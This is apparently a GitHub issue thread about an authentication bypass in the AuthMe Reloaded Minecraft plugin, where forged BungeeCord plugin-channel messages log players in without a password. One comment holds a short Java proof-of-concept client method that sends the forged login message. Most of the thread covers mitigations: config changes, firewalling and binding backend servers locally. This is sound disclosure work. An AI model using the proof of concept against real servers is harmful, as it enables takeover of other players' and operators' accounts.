AuthMe Reloaded

AuthMe Reloaded

3M Downloads

Plugin channel attacks on misconfigured setups

MossCG opened this issue ยท 9 comments

commented

What behaviour is observed?

I received a video from my friend, it shows someone with a cheat client can login op's account without password.
I asked for others, got a reply that disable 'Hooks.bungeecord' in config can temp fix this.
Maybe we can add a auth of this? Just like add a password when send/recv message with bungeecord.

Video: https://user-images.githubusercontent.com/77914339/177022066-f35fc429-6539-4018-94b4-7f65029f2c5f.mp4

Expected behaviour

fix pls

To Reproduce

In video.

Plugin list

In video.

Server Implementation

BungeeCord

Database Implementation

MySQL

AuthMe Version

latest

Error log (if applicable)

nope

Configuration

nope

commented

Just like add a password when send/recv message with bungeecord.

Well a password could then be received by client. What would be better is an cryptographic authenticated message like a signature from the BungeeCord proxy with potentially protection against replay attacks.

What irritates me about this ticket is the point that the bug exists for BungeeCord proxies too. This plugin uses the BungeeCord channel. Looking at the official BungeeCord implementation, this means that the message will not be forwarded further from the client to the Spigot server.

https://github.com/SpigotMC/BungeeCord/blob/587fb37bdf3438708649c18c9271ec20bb36e74b/proxy/src/main/java/net/md_5/bungee/connection/UpstreamBridge.java#L261

This is also already discussed in #2442

commented

https://github.com/AuthMe/AuthMeReloaded/blob/master/src/main/java/fr/xephi/authme/service/bungeecord/BungeeReceiver.java

Authme didn't check the packet source and accept all packet whatever it send from.

Player can send a bad packet to treat Authme to login a player.

commented

For anyone to avoid this bug, set Hooks.bungeecord: false in your config.yml:

Hooks:
    # Do we need to hook with BungeeCord?
    bungeecord: false

Player might need to /login every time they switch server though. Hope fix will come soon.

Related issue: #2559

commented

PoC:

    public void onUse() {
        try {
            PacketBuffer buffer1 = new PacketBuffer(Unpooled.buffer());
            buffer1.writeString("BungeeCord");
            Minecraft.getMinecraft().player.connection.sendPacket(new CPacketCustomPayload("REGISTER", buffer1));

            ByteArrayOutputStream buffer2 = new ByteArrayOutputStream();
            DataOutputStream out = new DataOutputStream(buffer2);
            out.writeUTF("AuthMe.v2");
            out.writeUTF("perform.login");
            out.writeUTF(Minecraft.getMinecraft().player.getName());

            PacketBuffer buffer3 = new PacketBuffer(Unpooled.buffer());
            buffer3.writeBytes(buffer2.toByteArray());
            Minecraft.getMinecraft().player.connection.sendPacket(new CPacketCustomPayload("BungeeCord", buffer3));
        } catch (Exception e) {
            if (ModuleDebug.enable) e.printStackTrace();
        }
    }

Solutions:

  1. Check org.spigotmc.SpigotConfig.bungee is enable
  2. If login via plugin message, re-verification player password
commented

Solution:

  1. For Single Server (not have bc)
    • Check Autume Configuration Hooks.bungeecord
      mute be false
  2. For BC Server
    In a word, proxy sub server should not be accessible when not have bc
    • Set up firewall, Make it impossible to enter directly
    • #2442
commented

Note for the future (as @games647 said in the security hotfix commit):

Nevertheless this doesn't fully solve the issue, because in misconfigured setups, where the Spigot server is publicly accessible, it's still possible. However this is always a recommended configuration step.

commented

is this fix now? my servers need this.

commented

Does this only work with an OPed account or can they login to any account?

commented

TL;DR

  • Not using a Minecraft proxy (e.g. BungeeCord) -> ignore this ticket or you are safe since the inclusion of this change
  • Using a Minecraft proxy and your Spigot server is not visible on the internet -> you are safe
  • Using a Minecraft proxy and your Spigot server is visible on the internet
    • Apply the same important security that applies to every proxy configuration
    • Firewall or bind your Spigot server to a local interface
    • https://www.spigotmc.org/wiki/bungeecord-installation/#post-installation
    • See the IMPORTANT SECURITY NOTICE: there
    • This applies to all proxy setups even without this plugin or any plugins. Backend servers (here: Spigot) should not be reachable other than the proxy software.

It should be noted that this ticket is only about if you are using a Minecraft proxy configuration, like BungeeCord/Waterfall or Velocity, and enable the associated proxy support in AuthMe.

The referenced change disables BungeeCord integration of AuthMe if you also have it disabled in Spigot. So prevents the issue when migrating from such a configuration back to direct connections between player and Spigot server.

However, it doesn't address the case that you are using a Minecraft proxy and your Spigot server is still public reachable. This means that someone can directly contact the Spigot server without involving the proxy. This is a common misconfiguration when using BungeeCord.

Always remind yourself of the following rule: Spigot servers should never be directly reachable if your are using BungeeCord, Waterfall, etc.. This also applies without any plugins involved and referenced multiple times:

https://www.spigotmc.org/wiki/bungeecord-installation/#post-installation
https://www.spigotmc.org/wiki/firewall-guide/

If running the Minecraft proxy and Spigot on the same host, the easiest solution is to use localhost/127.0.0.1 in the server-ip of the Spigot servers. Then, the spigot server is only reachable to local programs, thus the proxy software. A small illustration:

When using a Minecraft proxy (e.g. BungeeCord)
Always: Player -> BungeeCord -> Spigot
Never: Player -> Spigot

You can also test the protection by checking if your Minecraft client can't (i.e. MOTD message) see Spigot server when entering the host port combination for a direct connection. Be warned that malicious users can fake the BungeeCord protocol, so testing a server join is not enough. The MOTD should only be visible when using the BungeeCord host and not Spigot host port combo.

There not much we can do on our end without much effort to prevent this misconfiguration. Only to re-iterate the same warning from BungeeCord as this applies to all Minecraft proxy setups even without plugins involved.